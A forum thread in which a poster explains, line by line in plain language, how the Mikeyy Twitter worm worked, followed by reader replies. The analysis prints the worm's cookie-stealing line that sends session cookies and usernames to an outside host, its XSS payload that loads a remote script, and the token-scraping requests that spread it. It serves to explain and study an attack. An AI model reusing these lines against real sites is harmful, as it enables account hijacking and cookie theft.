Mikeyy Twitter Worm Explained in Plain English

[gxd5]

As most of you know, the Mikeyy worm and its variants have been infecting Twitter profiles recently. However, many of you might not know exactly how this worm works. This is a quick run down of the source code, in case you are interested.

Note, that this is not a technical run down. I've made this in as plain language as possible. So, programmers, cut me some slack I just thought it would be interesting for people to see how this virus actually worked.

Here goes...


*** The Switchboard - How the Virus Communicated with the Twitter Servers ***

The original virus had a few main function. The first was a function called XHConn:

function XHConn() { ... code removed ... }

In order for the attack to work, the hacker had to use something called asynchronous javascript and XML, or AJAX for short. AJAX allows web pages to make calls to a server from your computer.

Back in the day, HTML files were static. You would download them from the web and display them on your computer. Once they were on your computer, they did not change. In order for the web page to change again, you had to click on something.

However, as the web got more advanced, there was a need for the web page to be able to change itself. Developers needed ways to get information from the server based on what the user was doing, without refreshing the page. So, they started creating things like Javascript, which let them make more powerful and functional web sites.

But in order for the javascript to connect to the server, it needed a way to communicate back and forth. There had to be some kind of switch board that would let the web page send commands to the server, and let the server send information back in response.

In the Mikeyy virus, XHConn was the switchboard. It was the function that allowed the virus to send instructions to and receive responses from the Twitter servers.


*** The Code Room - How the Virus Encoded Its Transmissions ***

The next function in the virus was the URLENCODE function:

function urlencode( str ) { ... code removed ... }

This function was like an encoder box that sat between the swtichboard and the server. The Twitter servers would not respond to transmissions that were not in the proper format. But, the virus needed to send it commands that contained code.

Unlike regular tweets, code has a bunch of special characters. Things like *#$Q#()*@&<>. Some of these characters cannot be sent in a regular URL or understood by servers if they are. In order to transmit the code without causing an error, the virus needed a way to encode it in such a way that the server would understand it.

So, before sending anything to Twitter, the virus would use the urlencode function to encode the transmission. That would ensure that it would arrive safely at the server and be in the proper format when it was received.


*** Getting the Blueprint ***

So far, the worm has not done anything. It has set up its communications switch board, and it has set up an encoder box to use for the transmissions. Now, it gets down to business:

var content = document.documentElement.innerHTML;

This single line does a lot of things. Whenever you are looking at a web page, the page itself is represented by a model. The model has all of the information necessary for your browser to create the page. It's like the blueprint of a web page.

If the virus has the blueprint, it can then search the page for information. And that is what the line above does. It creates a copy of the web page and stores it in a variable called 'content'.


*** Locating the User Name ***

Now that the virus has a map of the web page, it has to find the information that it needs. And that information is the USERNAME. If the virus has the username, it can use that to do two things:

1) Send Tweets
2) Infect the profile

To get the username, the first thing it has to do is find it. Thats what this line of code does:

userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);

This creates something called a REGULAR EXPRESSION. Now, computers are kind of stupid in a way. If you have ever tried to program one, then you know if you even get one single period, comma, or semi colon wrong, the entire thing blows up. But, sometimes you need to search for things that you don't exactly know what they are.

Imagine that you are sending your computer to the store to buy milk. Traditionally, you would have to specify EXACTLY what you wanted the computer to get. "Go get organic 1% milk". But what if the store was out of that exact kind of milk? The computer would throw an error.

With a regular expression, you don't have to be exact. You can just say, "Buy Milk", and the computer will go and get the closest thing it can. It gives you more flexibility, and makes it more likely that the comptuer will succeed in its task.

That is what the virus is doing here. It knows it needs to search through the content of the web page to get the user name, so it has created a regular expression to help it find what it is looking for.

In th enext two lines:

var username = userreg.exec(content);
username = username[1];

We see the regular expression put to work. The first line simply tells the computer to search through the content and find anything that matches the regular expression that was set up earlier. The second line takes the match (ie, the user name), and assigns it to a variable called 'username'. The virus now knows who's page it is attacking.

Next, the virus does some sneakiness. First, it tries to grab the cookies from the current document:

var cookie;
cookie = urlencode(document.cookie);

Notice how it uses the urlencode function? That is the encoder we discussed earlier. Now, remember, the encoder was used to encode things that need to be transmitted. This is encoding the cookies that it finds. Obviously, it is going to transmit those cookies somewhere.

But where? And how?

We find out in the next line:

document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");

Javascript has a lot of functions that allow a program to modify a web page. One of those functions is called 'document.write'. The name does what it sounds like - it writes code to a web page.

In this case, what the virus is doing is writing an IMAGE to the web page. Or is it? We see that there is an image tag there...

<img src='http://mikeyylolz.uuuq.com/x.php?c='>

But WAIT! It is NOT pointing to an image file. Instead, it is pointing to a PHP script. Whats more, it is passing variables to the script in the query string. If we run the document.write function, this is what gets written to the browser:

<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>

Let's break that down some more. This is calling a PHP script called x.php:

404 Page Not Found

See the question mark in the image src? That question mark is called the 'query string'. What it does is allow you to send variables - pieces of information - to a web page. In this case, there are two variables being sent:

c (the cookie)
username (the username)

So, the virus is writing a fake image to the browser and using that to pass information that it stole from the HTML page using a regular expression to a PHP script. All in one line of code. Whew. Got that?

The virus is not done. Now, it creates a real image:

document.write("<img src='http://stalkdaily.com/log.gif'>");

This gif will not only track all of the visitor IP's, User Agents, and Referrers, it could also be used to... stuff cookies? Do other various and sundry bad things? At any rate, this is a tracking pixel that is being set so the attacker can run metrics on the attack.

Okay, so the virus has created a switch board, set up an encoding box, and used that to transmit all of the information needed for the attack. Time to attack.

The entire attack happens inside of a function called wait(). I will go through this function in a fairly detailed fashion. But, most of the hard stuff is already done. If you followed up to here, you can get through the rest.

*** The Attack Function ***

Here we go... the first lines should look familiar:

1 - var content = document.documentElement.innerHTML;
2 - athreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
3 - var authtoken = authreg.exec(content);
4 - authtoken = authtoken[1];

This is the same pattern that we saw before when the virus got the username. This time, the virus needs to get the authtoken. So, it starts out by getting the blueprint for the web page (1), then creating a regular expression that it can use to search through the web page (2), executing the regular expression (3) and then storing the result in a variable (4).

This is the same exact thing it did before.

This is kind of funny. There is a commented out line of code next:

//alert(authtoken);

This is how the attacker was debugging his code Alerts are for losres, hahaha, get a real debugger son! Anyway, lets continue...

The next few lines of code generate a random update to tweet:

1 - var randomUpdate=new Array();
2 - randomUpdate[0]="Dude, StalkDaily - Oops, stay tuned. is awesome. What's the fuss?";
3 - randomUpdate[1]="Join StalkDaily - Oops, stay tuned. everyone!";
4 - randomUpdate[2]="Woooo, StalkDaily - Oops, stay tuned. ";
5 - randomUpdate[3]="Virus!? What? StalkDaily - Oops, stay tuned. is legit!";
6 - randomUpdate[4]="Wow...www.StalkDaily.com";
7 - randomUpdate[5]="@twitter www.StalkDaily.com";

8 - var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
9 - updateEncode = urlencode(genRand);

Line 1 creates a container that will hold the possible tweets. Lines 2-7 are the tweets themselves. Line 8 randomly picks a tweet from the container. And line 9 encodes the tweet so it can be sent to Twitter.

Now, for the viral load:

1 - var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

This line encodes the exploit in a variable called xss. There is much sneakiness going on here. Let's go slowly past it to see what happens.

A normal HTML link looks like this:

<a href="URL VALUE">LINK TEXT</a>

It has three parts. First, it is wrapped in an anchor tag: <a></a>

The anchor tag itself usually has an attribute called HREF. This is the URL that you go to when someone clicks the link. That looks like this:

<a href="http://your.url.com"></a>

The last element is the link text. The link text is what people click on. So, when we see the HTML code for an anchor, we can see the three parts:

<a href="URL VALUE">LINK TEXT</a>

Anchor tag, URL, and LINK TEXT. Got it?

Okay. Now, sometimes, programs will insert values for the URL and Link text for you. And, they will do this automatically. To do that, they will just switch the values for the URL and the LINK TEXT. And, to make that easy, they usually have a template, like this:

<a href="#URL#">#LINK NAME#</a>

When the computer sees that template, it says, "I need to replace the #URL# value with a real url, and I need to replace the #LINK# value with a real link name. Suppose that the url was

http://www.warriorforum.com

and the link name was

gxd5

Then, this:

<a href="#URL#">#LINK NAME#</a>

Would become this:

<a href="http://www.warriorforum.com">gxd5</a>

Got it? Okay, now for the attack. Suppose that instead of using 'http://www.warriorforum.com' for the #URL# value, we used the XSS value that the virus uses. Just so you remember, it is this:

http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a

Now, this is the way the code would look:

<a href="http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a "">gxd5</a>

Do you see what they did?

They closed the original anchor tag! Then, they inserted a script tag that downloads the virus code onto the browser that is currently watching the page! This is how YOU get infected when you look at an infected page.

The virus payload downloads onto your computer as soon as you look at the page.

BUT... you HAVE to be logged in to twitter for this to work. Fortunately for the virus, since it is a twitter based virus, most of you already are logged in. So, the exploit works.

Now that the code is there, what will it do?

1 - var ajaxConn = new XHConn();
2 - ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateE ncode+"&tab=home&update=update");

Line 1 - Remember XHConn? That is the switchboard. The virus is getting ready to send a command to the server.

Line 2 - The command gets sent. It is 'status/update'... this is how a tweet gets sent. Notice that it is using the authotken it grabbed and the randomly generated and encoded status that it pulled. This is where that information finally gets used.


3 - var ajaxConn1 = new XHConn();
4 - ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

Line 3 - Another connection is created.
Line 4 - This is the core of the virus reproduction. This changes your 'account/settings' user url, and changes it to the exploit url above. Instead of:

<a href="http://www.warriorforum.com">gxd5</a>

You would have something like this:

<a href="http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a "">gxd5</a>

And that would infect everyone who looked at your profile.

The final line of code is here:

setTimeout("wait()",3250);

This is the ticking time bomb. That code sets a timer that will wait 3,250 milliseconds before executing the code in the wait() function and letting the virus loose.

Variants of this virus are already springing up, but they are all using similar vectors. You would have thought that Twitter would have plugged ALL the holes the first go round. But, maybe they didn't understand how the virus worked.

Hopefully, they have accounts at Warrior Forum

I wasn't planning to write a post THIS long, but things like this are interesting to me, and I hope that this was entertaining and informative for you as well.

[iw433]

Well the only thing I can say is I'm glad you are an honest guy. Thanks for the info.

[Pete223]

Yep, I'm with Bill on this one... couldn't imagine the damage you
could do if you decided to "jump the fence"! LOL

Quote:

"I've made this in as plain language as possible"

I still feel like I'm reading a restaurant menu in Mandarin...
I'll take #3 and #5

Cheers, Pete

[Jon Alexander]

fantastic analysis. AJAX. Huh.

[Devon Brown]

That was English? I commend you for taking the time and really explaining it. My assistant is more technically savvy than I am so this will appeal to her!

[ExRat]

Hi gxd5,

I struggle to read all of the stuff written about twitter here anyway, but your verbosity in describing the details of twitter's infection unfortunately triggered a severe attack of A.D.D. here. Luckily, there's footie on the box...

I'm sure it was interesting and helpful though, thanks for sharing.

[gxd5]

Hahah... still not English enough I will try harder next time! Maybe a video would be easier?

[LordXenu]

Interesting write up, you'd think one of the first things sites like this do from a security standpoint is to be sure javascript is not injectable through any of their forms. Myspace Videos had an exploit like this a few months back, and even youtube had a similiar expploit open a year or so ago now.

[gxd5]

XSS attacks can be hard to defend against... some of the exploits and some of the attackers are quite sophisticated.

That said, this worm was bush league. The level of skill shown was basic at best. I felt like optimizing it while I was analyzing the code.

Twitter really blew it. They are lucky it was Mikeyy and not a serious attacker.